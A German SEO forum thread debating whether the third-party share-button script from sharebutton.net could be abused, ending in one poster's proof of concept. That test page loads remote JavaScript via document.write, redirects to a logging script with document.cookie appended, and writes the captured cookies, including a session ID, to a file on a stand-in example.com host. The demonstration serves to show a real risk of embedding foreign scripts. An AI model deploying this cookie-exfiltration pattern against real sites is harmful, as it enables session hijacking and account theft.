Herzlich willkommen im SEO Forum der ABAKUS Internet Marketing GmbH
registrieren registriertes Mitglied
möglich, ändert aber nichts an der offensichtlichen absicht hinter sharebutton.net...[btk]tobi hat geschrieben:Schau dir mal die Twitter Accounts genau an, die machen alle den Eindruck als ob sie an Share tausch Programmen wie addmefast.com teilnehmen. Also nichts mit gehackten Twitter Accounts sondern ganz normaler Spam.
Gruß Tobi
Hallo Tobi.[btk]tobi hat geschrieben:Naja die offensichtliche Absicht hinter sharebutton.net ist es Share Buttons zu verteilen. Ob es sinnvoll ist dafür einen solchen Dienst zu verwenden oder nicht muss jeder selber wissen.
Wie du drauf kommst das die ein Botnetz vorbereiten kapier ich nicht so ganz.
Gruß Tobi
Diese Möglichkeit würde ich nicht gänzlich ausschließen, wenn erst einmal so um die 1.000 oder mehr Nichtsahnende den bereitgestellten Code in ihre eigenen Webseiten eingefügt haben:al-dente78 hat geschrieben:Da sind einige Kollegen aber ganz anderer Ansicht.
https://www.website-go.com/artikel/bloc ... ebsite.phpEs wäre also denkbar - und ist imho naheliegend - dass der ferne Code gegen einen anderen ausgetauscht wird.
Verstehe ich jetzt nicht ganz. Der artikel liest sich wie aus einer fernsehreportage, deren redakteure gerade genug halbwissen haben um ein domain-whois zu finden und dann eben "aufdeckt" das da jemand seine adresse versteckt hat.Melegrian hat geschrieben: Der von einem entfernten Server geladene Code brauchte dazu nicht einmal ständig ausgetauscht werden, sondern nur stundenweise, bis genügend Rechner mit Malware verseucht oder Seiten gehackt wurden.
Muss ich mir erst einmal ausprobieren, wenn ich dazu kommen sollte, dann heute noch. Der Code ist doch so gewählt, dass die entfernte Seite mit document.write ins Dokument geschrieben wird, wodurch die geladene JavaScript-Seite dann nicht mehr zu einem Drittanbieter gehört, sondern Bestandteil von DOM wird. Anders wäre es, wenn die JavaScript-Seite nur einen iFrame laden würde, wie bei vielen Widgets der Fall, dann würde der per JavaScript von einer entfernten Seite geladene iFrame zum DOM gehören, die Seite im iFrame aber zu einem Drittanbieter.nerd hat geschrieben:Cookies stehlen oder sessions von der seite uebernehmen geht ja prinzipiell nicht, da der browser beim ausfuehren von buttons-for-websites javascipt eben KEINEN zugriff auf die cookies der seite hat, auf der der code eingebunden wird.
Code: Alles auswählen
<?php
setcookie("coderwelten_php", "test_php", time() + 86400, "/");
?>
<!DOCTYPE html>
<html>
<head>
<title>Testseite</title>
<script type="text/javascript">
var angabe = new Date();
angabe.setTime(angabe.getTime() + (24 * 60 * 60000));
document.cookie = "coderwelten_js=test_js; expires=" + angabe.toGMTString() + "; path=/";
</script>
</head>
<body>
<h1 style="text-align:center">Testseite</h1>
<p style="text-align:center">Ich bin nur eine Testseite</p>
<!-- Der Code-Schnipsel zum Einbinden -->
<script type="text/javascript">
document.write("<script src='http://www.example.com/extern/plugin.php' type='text/javascript'><\/script>");
</script>
</body>
</html>
Code: Alles auswählen
<?php
header( "Cache-Control: no-cache, must-revalidate" );
header( "Expires: Thu, 01 Jan 1970 00:00:00 GMT" );
header( "Pragma: no-cache" );
header( "Content-type: text/javascript; charset=UTF-8");
echo "if (document.cookie) {\n".
"\twindow.location.href = \"http://www.example.com/extern/".
"protokolliere.php?uebergabe=\"+escape(document.cookie);\n".
"}\n";
?>
Code: Alles auswählen
<?php
if (isset($_GET["uebergabe"]) and !empty($_GET["uebergabe"])) {
// Filterung lasse ich hier ausnahmsweise weg im Test.
file_put_contents("protokolliere.txt", $_GET["uebergabe"], LOCK_EX);
}
?>
Code: Alles auswählen
if (!session_id()) session_start();
coderwelten_php=test_php; coderwelten_js=test_js; PHPSESSID=6idqp60eakp18egkr5tm9s5b51